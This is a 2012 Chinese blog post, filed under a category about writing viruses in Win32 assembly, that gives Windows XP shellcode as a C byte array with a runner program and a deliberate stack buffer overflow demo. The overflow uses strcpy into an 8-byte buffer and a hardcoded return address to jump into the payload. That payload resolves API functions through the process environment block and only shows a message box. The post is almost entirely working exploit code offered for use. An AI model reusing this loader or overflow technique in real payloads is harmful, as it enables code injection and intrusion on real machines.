注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

xp下的一段shellcode  

2012-03-29 14:51:17|  分类: Win32汇编写病毒 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
char strShellCode[] = {
0xE9,  0xA8,  0x00,  0x00,  0x00,  0x5A,  0x64,  0xA1,  0x30,  0x00,  0x00,  0x00,  0x8B,  0x40,  
0x0C,  0x8B,  0x40,  0x1C,  0x8B,  0x00,  0x8B,  0x40,  0x08,  0x50,  0x52,  0x6A,  0x0C,  0xE8,  
0x2F,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x0D,  0x53,  0xFF,  0xD0,  0x83,  0xC3,  0x07,  
0x53,  0x6A,  0x0B,  0xE8,  0x1D,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x18,  0x6A,  0x00,  
0x53,  0x53,  0x6A,  0x00,  0xFF,  0xD0,  0xBA,  0x0C,  0x00,  0x00,  0x00,  0x58,  0x2B,  0xDA,  
0x53,  0x52,  0xE8,  0x02,  0x00,  0x00,  0x00,  0xFF,  0xD0,  0x8B,  0xD8,  0x83,  0xC0,  0x3C,  
0x8B,  0x00,  0x03,  0xC3,  0x80,  0x38,  0x50,  0x75,  0x49,  0x8B,  0x40,  0x78,  0x03,  0xC3,  
0x50,  0x8B,  0xC8,  0x8B,  0x49,  0x14,  0x8B,  0x40,  0x20,  0x03,  0xC3,  0x55,  0x8B,  0xE8,  
0x33,  0xD2,  0x51,  0x8B,  0x00,  0x03,  0xC3,  0x8B,  0xF8,  0x8B,  0x74,  0x24,  0x14,  0x8B,  
0x4C,  0x24,  0x10,  0xFC,  0xF3,  0xA6,  0x75,  0x17,  0x83,  0xC4,  0x04,  0x8B,  0x44,  0x24,  
0x04,  0x8B,  0x40,  0x1C,  0x03,  0xC3,  0xC1,  0xE2,  0x02,  0x03,  0xC2,  0x8B,  0x00,  0x03,  
0xC3,  0xEB,  0x0B,  0x42,  0x83,  0xC5,  0x04,  0x8B,  0xC5,  0x59,  0xE2,  0xCC,  0x33,  0xC0,  
0x5D,  0x59,  0xC2,  0x04,  0x00,  0xE8,  0x53,  0xFF,  0xFF,  0xFF,  0x4C,  0x6F,  0x61,  0x64,  
0x4C,  0x69,  0x62,  0x72,  0x61,  0x72,  0x79,  0x41,  0x00,  0x75,  0x73,  0x65,  0x72,  0x33,  
0x32,  0x00,  0x4D,  0x65,  0x73,  0x73,  0x61,  0x67,  0x65,  0x42,  0x6F,  0x78,  0x41,  0x00,  
0x45,  0x78,  0x69,  0x74,  0x50,  0x72,  0x6F,  0x63,  0x65,  0x73,  0x73,  0x00,  0x4F,  0x4B,  
0x00
};

int main(int argc, char* argv[])
{
((void (_stdcall*)())&strShellCode[0])();
return 0;
}



//溢出漏洞利用
#include <string>

char strShellCode[] = {
0x41,  0x41,  0x41,  0x41,
0x42,  0x42,  0x42,  0x42,
0x3c,  0x60,  0x40,  0x00,
0xE9,  0xA8,  0x00,  0x00,  0x00,  0x5A,  0x64,  0xA1,  0x30,  0x00,  0x00,  0x00,  0x8B,  0x40,  
0x0C,  0x8B,  0x40,  0x1C,  0x8B,  0x00,  0x8B,  0x40,  0x08,  0x50,  0x52,  0x6A,  0x0C,  0xE8,  
0x2F,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x0D,  0x53,  0xFF,  0xD0,  0x83,  0xC3,  0x07,  
0x53,  0x6A,  0x0B,  0xE8,  0x1D,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x18,  0x6A,  0x00,  
0x53,  0x53,  0x6A,  0x00,  0xFF,  0xD0,  0xBA,  0x0C,  0x00,  0x00,  0x00,  0x58,  0x2B,  0xDA,  
0x53,  0x52,  0xE8,  0x02,  0x00,  0x00,  0x00,  0xFF,  0xD0,  0x8B,  0xD8,  0x83,  0xC0,  0x3C,  
0x8B,  0x00,  0x03,  0xC3,  0x80,  0x38,  0x50,  0x75,  0x49,  0x8B,  0x40,  0x78,  0x03,  0xC3,  
0x50,  0x8B,  0xC8,  0x8B,  0x49,  0x14,  0x8B,  0x40,  0x20,  0x03,  0xC3,  0x55,  0x8B,  0xE8,  
0x33,  0xD2,  0x51,  0x8B,  0x00,  0x03,  0xC3,  0x8B,  0xF8,  0x8B,  0x74,  0x24,  0x14,  0x8B,  
0x4C,  0x24,  0x10,  0xFC,  0xF3,  0xA6,  0x75,  0x17,  0x83,  0xC4,  0x04,  0x8B,  0x44,  0x24,  
0x04,  0x8B,  0x40,  0x1C,  0x03,  0xC3,  0xC1,  0xE2,  0x02,  0x03,  0xC2,  0x8B,  0x00,  0x03,  
0xC3,  0xEB,  0x0B,  0x42,  0x83,  0xC5,  0x04,  0x8B,  0xC5,  0x59,  0xE2,  0xCC,  0x33,  0xC0,  
0x5D,  0x59,  0xC2,  0x04,  0x00,  0xE8,  0x53,  0xFF,  0xFF,  0xFF,  0x4C,  0x6F,  0x61,  0x64,  
0x4C,  0x69,  0x62,  0x72,  0x61,  0x72,  0x79,  0x41,  0x00,  0x75,  0x73,  0x65,  0x72,  0x33,  
0x32,  0x00,  0x4D,  0x65,  0x73,  0x73,  0x61,  0x67,  0x65,  0x42,  0x6F,  0x78,  0x41,  0x00,  
0x45,  0x78,  0x69,  0x74,  0x50,  0x72,  0x6F,  0x63,  0x65,  0x73,  0x73,  0x00,  0x4F,  0x4B,  
0x00
};

void OverFlow(char* p)
{
char str[8];
strcpy(str,p);
}


int main(int argc, char* argv[])
{
OverFlow(strShellCode);
// ((void (_stdcall*)())&strShellCode[0])();
return 0;
}
  评论这张
 
阅读(170)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017